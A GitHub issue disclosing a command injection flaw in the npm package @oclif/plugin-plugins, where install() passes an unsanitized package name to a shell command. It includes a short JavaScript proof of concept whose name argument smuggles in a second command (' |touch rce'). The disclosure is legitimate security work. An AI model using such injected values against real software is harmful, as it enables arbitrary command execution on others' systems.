You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method install() fails to sanitize its parameter name and let it flow into a sensitive command execution API.
In this way, attackers can specify a malformed package name to inject malicious commands.
Here is the proof of concept.
const lib = require('@oclif/plugin-plugins');
var config = {
dataDir: '',
pjson: {
oclif: {
scope: ' ' }}
}
var a = new lib.default(config)
a.install(' |touch rce')// a file named rce will be created
Please consider fixing it. thanks!
The text was updated successfully, but these errors were encountered:
Hi,
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method
install()fails to sanitize its parameternameand let it flow into a sensitive command execution API.In this way, attackers can specify a malformed package name to inject malicious commands.
Here is the proof of concept.
Please consider fixing it. thanks!
The text was updated successfully, but these errors were encountered: